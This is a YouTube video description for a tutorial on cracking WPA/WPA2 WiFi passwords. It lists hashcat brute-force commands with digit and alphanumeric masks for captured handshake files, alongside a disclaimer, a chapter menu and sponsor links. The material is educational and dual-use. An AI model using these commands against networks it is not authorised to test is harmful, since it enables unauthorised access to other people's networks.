16 secs to break it! šŸ˜± 70% of real world WiFi networks owned!
David Bombal David Bombal
2.65M subscribers
1,637,291 views
34K

 Published On Feb 25, 2022

Big thanks to Cisco Meraki for sponsoring this video! Learn how to secure hybrid networks so you can stop these kinds of attacks: https://davidbombal.wiki/meraki

Disclaimer: This video is for educational purposes only. I own all equipment used for this demonstration. No actual attack took place on any websites. Only use the tools demonstrated in this video on networks you have permission to attack.

// MENU //
00:00 ā–¶ļø Intro
02:17 ā–¶ļø Real word example
02:58 ā–¶ļø Hashcat file format
03:28 ā–¶ļø Handshake capture (old mode) 10 digits
03:57 ā–¶ļø GPU setup
04:12 ā–¶ļø Handshake capture (old mode) 10 digits (cont'd)
06:21 ā–¶ļø Handshake capture (new mode) 8 digits
07:57 ā–¶ļø Handshake capture (old mode) 8 digits
09:07 ā–¶ļø Incrementing digits
11:55 ā–¶ļø Built-in charsets
12:22 ā–¶ļø Cracking alphanumerical passwords
18:42 ā–¶ļø Using wordlists
19:00 ā–¶ļø Conclusion

// Previous Videos //
WiFi WPA/WPA2 vs hashcat and hcxdumptool: Ā Ā Ā ā€¢Ā WiFiĀ WPA/WPA2Ā vsĀ hashcatĀ andĀ hcxdumptoolĀ Ā 
Kali Wifi Adapters: Ā Ā Ā ā€¢Ā BestĀ WiFiĀ HackingĀ AdaptersĀ inĀ 2021Ā (K...Ā Ā 
Old method using airmon-ng: Ā Ā Ā ā€¢Ā CrackingĀ WiFiĀ WPA2Ā HandshakeĀ Ā 
Old method using GPUs: Ā Ā Ā ā€¢Ā BruteĀ forceĀ WiFiĀ WPA2Ā Ā 

// COMMANDS //
Check GPU:
hashcat.exe -I

10 digits (Old Method):
hashcat.exe -m 2500 -a 3 10digit.hccapx ?d?d?d?d?d?d?d?d?d?d

Increment WPA2 digits (Old Method):
hashcat.exe -m 2500 -a 3 10digit.hccapx --increment --increment-min 8 --increment-max 20 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d

8 digits (New Method):
hashcat.exe -m 22000 8-digit-wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d

10 digits (New Method):
hashcat.exe -m 22000 10-digit-wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d

10 digits and alpha (New Method):
hashcat.exe -m 22000 10-digit-letters-wpa2.hc22000 -1 ?d?l?u -a 3 ?1?1?1?1?1?1?1?1?1?1

Increment digits (New Method):
hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d

Increment digits and alpha (New Method):
hashcat.exe -m 22000 10-digit-letters-wpa2.hc22000 -1 ?d?l?u -a 3 --increment --increment-min 8 --increment-max 12 ?1?1?1?1?1?1?1?1?1?1?1?1


// Previous Videos //
WiFi WPA/WPA2 vs hashcat and hcxdumptool: Ā Ā Ā ā€¢Ā WiFiĀ WPA/WPA2Ā vsĀ hashcatĀ andĀ hcxdumptoolĀ Ā 
Kali Wifi Adapters: Ā Ā Ā ā€¢Ā BestĀ WiFiĀ HackingĀ AdaptersĀ inĀ 2021Ā (K...Ā Ā 
Old method using airmon-ng: Ā Ā Ā ā€¢Ā CrackingĀ WiFiĀ WPA2Ā HandshakeĀ Ā 
Old method using GPUs: Ā Ā Ā ā€¢Ā BruteĀ forceĀ WiFiĀ WPA2Ā Ā 

// SOCIAL //
Discord: Ā Ā /Ā discordĀ Ā 
Twitter: Ā Ā /Ā davidbombalĀ Ā 
Instagram: Ā Ā /Ā davidbombalĀ Ā 
LinkedIn: Ā Ā /Ā davidbombalĀ Ā 
Facebook: Ā Ā /Ā davidbombal.coĀ Ā 
TikTok: Ā Ā /Ā davidbombalĀ Ā 
YouTube: Ā Ā Ā /Ā davidbombalĀ Ā 

// MY STUFF //
Monitor: https://amzn.to/3yyF74Y
More stuff: https://www.amazon.com/shop/davidbombal

// SPONSORS //
Interested in sponsoring my videos? Reach out to my team here: [email protected]

wifi
gpu
kali linux
kali wifi
kali
alfa
alfa network
alfa network adapter
wifi password
wpa
wpa2
hashcat
linux

Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

#wifi #wpa2 #hashcat

show more

Share/Embed